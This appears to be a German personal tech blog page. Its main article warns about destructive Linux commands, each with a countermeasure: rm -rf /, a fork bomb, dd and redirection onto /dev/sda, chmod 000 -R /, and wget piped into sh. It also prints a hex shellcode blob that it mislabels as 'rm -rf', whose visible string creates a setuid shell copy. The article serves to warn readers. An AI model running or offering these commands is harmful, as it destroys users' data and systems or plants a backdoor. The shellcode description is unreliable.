ro­boco­py — zeit­ge­steu­ert lau­fen lassen

Der Bei­trag ist eine Wei­ter­füh­rung des Bei­tra­ges “ro­boco­py — schnel­les Back­up in Win­dows”.
Hier wer­den die Mög­lich­kei­ten der zeit­li­chen Pla­nung von ro­boco­py-An­wei­sun­gen erklärt.

In­halts­ver­zeich­nis

  • Per­ma­nen­te und kurz-pe­ri­odi­sche Sicherung
  • Täg­li­che Sicherung
  • Ab­ge­bro­che­ne Si­che­rung fortführen
  • Wo­chen- und län­ger­fris­ti­ge Planung
ro­boco­py — zeit­ge­steu­ert lau­fen las­sen weiterlesen

ro­boco­py — schnel­les Back­up in Windows

Jetzt oute ich mich: Ter­mi­nal­pro­gram­me sind ein Quell der Freu­de! Meist sind die Kon­so­len­pro­gram­me klein, schnell und ef­fi­zi­ent, ganz nach dem KISS-Prin­zip.
Und Mi­cro­soft hat mit “ro­boco­by” ein an­sehn­li­ches Pro­dukt ge­schaf­fen, um kom­for­ta­ble Da­ten­si­che­run­gen durch­zu­füh­ren. Ich be­zie­he mich in die­sem Bei­trag auf die ro­boco­py-Ver­si­on in “Mi­cro­soft Win­dows [Ver­si­on 10.0.19042.868]”.
Hier gebe ich ei­ni­ge Hin­wei­se zur Nutzung. 

In­halts­ver­zeich­nis

  • Li­zenz
  • Ein­satz­ge­bie­te
  • Vor­tei­le
  • Nach­tei­le
  • Funk­ti­ons­wei­se
  • Syn­tax
  • Op­ti­on “/MT
  • Sze­na­rio
  • Wei­te­re Informationen
ro­boco­py — schnel­les Back­up in Win­dows weiterlesen

Shell­script

Ein Shell­script ist ein we­nig der Batch­da­tei in Win­dows ähn­lich. Ein Shell­script ar­bei­tet im Nor­mal­fall im Ter­mi­nal. Da die Bash, das ist mög­li­cher­wei­se die meist­ge­nutz­te Shell un­ter Li­nux, aber all­mäch­tig ist, hinkt der Ver­gleich mit der Batch­da­tei von Win­dows. Denn auch die so­ge­nann­te “PowerS­hell” von Win­dows hat nicht an­nä­hernd die Kraft ei­ner Bash.

In­halts­ver­zeich­nis

Shell­script weiterlesen

Ak­tua­li­sie­rung, Re­pa­ra­tur und Be­rei­ni­gung von De­bi­an, Ubun­tu und Mint

Da ich gern mein De­bi­an ba­sie­ren­des Sys­tem selbst ak­tua­li­sie­ren woll­te, hat­te ich mir die­ses Bash-Script ge­schrie­ben. Zu­dem lö­sche ich da­mit alte Ker­nel die ich nicht mehr nut­ze und re­pa­rie­re miss­glück­te Ak­tua­li­sie­run­gen. Also hier mein zwei­tes Script.

In­halts­ver­zeich­nis

Ak­tua­li­sie­rung, Re­pa­ra­tur und Be­rei­ni­gung von De­bi­an, Ubun­tu und Mint weiterlesen

Script: In­stal­lier­te Pro­gram­me als Liste

Um eine Über­sicht mei­ner in­stal­lier­ten Pro­gram­me zu er­hal­ten, habe ich mir die­se Script ge­schrie­ben. Die­ses Bash-Script ist das ers­te, das ich veröffentliche.

In­halts­ver­zeich­nis

Script: In­stal­lier­te Pro­gram­me als Lis­te weiterlesen

Ge­fähr­li­che Be­feh­le, Linux-Bomben


In­halts­ver­zeich­nis

Vor­wort
1. rm
2. rm ‑rf in hexadezimal
3. Fork­bomb
4. Copy und Paste
5. De­vice Null
6. Ope­ra­to­ren
7. WGET
8. dd
9. Wei­te­re Befehle
Fa­zit
Quel­len


Vor­wort

Vor­sicht, nur in vir­tu­el­len Ma­schi­nen tes­ten! Als Test­sys­tem hat­te ich ein Ubun­tu 16.04 in eine vir­tu­el­le Ma­schi­ne in­stal­liert und mehr­fach kopiert.


1. rm

Die be­kann­tes­te Li­nux-Bom­be ist wohl “rm”, denn es wird oft ver­ges­sen den kom­plet­ten Pfad an­zu­ge­ben, auch wenn man in ei­nem Un­ter­ver­zeich­nis ist, denn die­ser Be­fehl geht über die Wur­zel. Und es ist auch hoch be­zahl­ten Ad­mins schon passiert.

sudo rm -rf /

Die­ser Be­fehl löscht ohne Nach­fra­ge re­kur­siv al­les ab Wur­zel­ver­zeich­nis. Al­les heißt, alle ein­ge­häng­te Lauf­wer­ke und auch alle Netzlaufwerke.
Funk­tio­niert tod­si­cher! Aber nicht un­ter dem Ubun­tu, dort wird eine War­nung ausgegeben.
Ge­gen­maß­nah­me
Ein Fall­strick kann “safe-rm” sein. Es soll vor un­be­ab­sich­tig­ten lö­schen hel­fen. Wer sich aber dar­an ge­wöhnt und auf ei­nen anderen/neuen Rech­ner kein “safe-rm” in­stal­liert hat, dann ist “rm” ist sei­ner Ge­walt nicht zu bremsen.
An­sons­ten hilft auch kein beten.
Quel­le
Wei­te­res in je­dem Li­nux-Hand­buch und je­der Unix-Befehlsreferenz.


2. rm ‑rf in hexadezimal

Ist ge­nau­so schädlich:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Un­ter Ubun­tu müss­ten dazu die Pa­ke­te re­lease und bikes­hed in­stal­liert sein. Hat bei mir un­ter Ubun­tu nicht funktioniert.


3. Fork­bomb

Rech­ner aus­las­ten mit Hin­ter­grund­ak­ti­vi­tät und da­mit die CPU mal rich­tig heiß wird und sich selbst auslötet.

:(){ :|:& };:

Funk­ti­on die de­fi­niert wird, hier “:()”, ruft sich selbst als Hin­ter­grund­ak­ti­vi­tät auf und über­gibt sich wie­der neu und so wei­ter, also eine ty­pi­sche Fork­bomb. Funk­tio­niert un­ter Ubun­tu. Bös­ar­tig, es wird am An­fang nicht gleich wahr­ge­nom­men und Sys­tem­mo­ni­to­re, wie “Con­ky”, zei­gen durch die 100% aus­ge­las­te­te CPU kei­ne Ver­än­de­run­gen an.
Ge­gen­maß­nah­me
Schutz gibt es, wenn die Da­tei “/etc/security/limits.conf” dem ent­spre­chend edi­tiert wird.


4. Copy und Paste

Das In­ter­net hilft bei vie­len Ge­le­gen­hei­ten, aber er­setzt nicht das ei­ge­ne Den­ken. Ko­pie­ren und Ein­fü­gen kann ge­fähr­lich sein. Hin­ter ei­ner harm­lo­sen Ein­ga­be wie

echo "Hallo Welt!"

kann man auch

rm -rf /

ver­ste­cken.
Ge­gen­maß­nah­me
Vor­sichts­hal­ber in ein Edi­tor ein­fü­gen, hilft aber auch nicht immer :-)


5. De­vice Null

Das Ge­rät Null ist tat­säch­lich ent­stan­den um Da­ten, die als un­wich­tig gel­ten, in das Nichts zu senden.
Doch fol­gen­de Be­fehls­zei­le löscht das ge­sam­te /home-Ver­zeich­nis des an­ge­mel­de­tem Benutzers.

mv ~ /dev/null

In Ubun­tu ist da­für kei­ne Be­rech­ti­gung vorhanden.
Ge­gen­maß­nah­me
Nach­den­ken, was soll eine Til­de, also das /home-Ver­zeich­nis, mit Null zu tun haben!


6. Ope­ra­to­ren

Ger­ne nut­ze ich das Kom­man­do “ls > Verzeichnis.txt” um mir den In­halt ei­nes Ver­zeich­nis als Text­da­tei ab­zu­le­gen. Und bei Än­de­run­gen lege ich mit dem dop­pel­ten Ope­ran­den “ls » Verzeichnis.txt” in der sel­ben Da­tei am Ende nach.

ls > /dev/sda

Wird aber die­ser Be­fehl aus­ge­führt über­schreibt er die ge­nann­te Fest­plat­te mit sich selbst. Statt “ls” könn­te auch ein an­de­rer Be­fehl ge­nom­men wer­den, die Aus­wir­kung ist gleich, da hier der Ope­rand den Feh­ler aus­übt. In Ubun­tu ist da­für kei­ne Be­rech­ti­gung vorhanden.
Ge­gen­maß­nah­me
Im­mer erst in ei­ner vir­tu­el­len Ma­schi­ne sol­che Kom­man­dos prüfen.


7. WGET

Ist die­sel­be Be­quem­lich­keit wie ko­pie­ren und ein­fü­gen. Ein Script wird im Netz zur Ver­fü­gung ge­stellt und nun kann man es ein­fach durch die Shell aus­füh­ren, mit Ver­hin­de­rung von wich­ti­gen Informationen.

wget http://webseite.com -q | sh

Nur, ob die Be­schrei­bung des Skrip­tes mit dem tat­säch­li­chem In­halt über­ein­stimmt, ist hier nicht plau­si­bel erwiesen.
Hat in mei­ner Ubun­tu-In­stal­la­ti­on nicht funktioniert.
Ge­gen­maß­nah­me
Durch “quiet” ist es noch nicht mal mög­lich die Ge­fahr zu ban­nen, zum Bei­spiel mit “Strg+c”.


8. dd

Die­ses Kom­man­do ist zum Ko­pie­ren ge­dacht. Hier ist Miss­brauch mög­lich, um Da­ten­trä­ger zu überschreiben.

dd if=/dev/urandom of=/dev/sda

An die­sem Bei­spiel wer­den Zu­falls­zah­len auf die ge­sam­te Fest­plat­te ge­schrie­ben und so­mit der vor­han­de­ne In­halt gelöscht.
Ge­gen­maß­nah­me
Da hab ich es mit Nel­son -> “Haha”.


9. Wei­te­re Be­feh­le die vor­sich­tig an­ge­wen­det wer­den sollten.

Die nach­fol­gen­den Kom­man­dos habe ich nicht ge­tes­tet, er­schei­nen aber logisch.

sudo chmod 000 -R /

Rech­te wer­den re­kur­siv ent­zo­gen oder kei­ne er­teilt wie man´s sieht. Da­ten blei­ben aber erhalten.
Mit um­ask wä­ren si­cher­lich auch sol­che Spiel­chen möglich.

touch root
sudo chattr +i root

Da­tei mit +i un­ver­än­der­lich setzen

sudo chattr -i root

At­tri­but wie­der entfernen


10. Fa­zit

Das sind wohl ei­ni­ge der be­kann­tes­ten Fall­gru­ben. Trotz­dem soll­te bei an­ge­bo­te­ner Hil­fe das ei­ge­ne Den­ken die ers­te Hür­de sein und ein ge­sun­des Maß an Miss­trau­en, ob an­de­re nicht auch Flüch­tig­keits­feh­ler ma­chen, wäre angebracht.


Quel­len

Li­nux-Hand­buch von Ko­f­ler, Gallileo-Verlag
Unix-Be­fehls­re­fe­ren­zen im Netz
http://www.junauza.com/2008/11/7‑deadly-linux-commands.html
https://ppfeufer.de/lokale-linuxssicherheit-oder-wie-entschaerf-ich-die-bombe.html/
https://www.schnatterente.net/software/versteckter-schadcode-gefaehrliche-linux-howtos/2
https://www.heise.de/security/dienste/Copy-Paste-Tricks-1842691.html
https://de.wikipedia.org/wiki//dev/null
https://de.godaddy.com/blog/die-5-gefaehrlichsten-kommandos-in-der-linux-konsole/
https://wiki.ubuntuusers.de/wget/
http://www.linux-community.de/Internal/Nachrichten/Die-7-toedlichsten-Linux-Kommandos

Fort­schritts­an­zei­ge bei Fest­plat­te lö­schen oder ko­pie­ren oder be­schrei­ben durch dd oder dc­fldd oder pv

Mit­un­ter sind trotz schnel­lem PC ei­ni­ge Vor­gän­ge sehr zeit­auf­wen­dig. Dazu ge­hö­ren Be­feh­le die eine Fest­plat­te ko­pie­ren, be­schrei­ben oder so­gar kom­plett lö­schen. Da wäre eine Fort­schritts­an­zei­ge sehr hilfreich.

In­halts­ver­zeich­nis

Fort­schritts­an­zei­ge bei Fest­plat­te lö­schen oder ko­pie­ren oder be­schrei­ben durch dd oder dc­fldd oder pv weiterlesen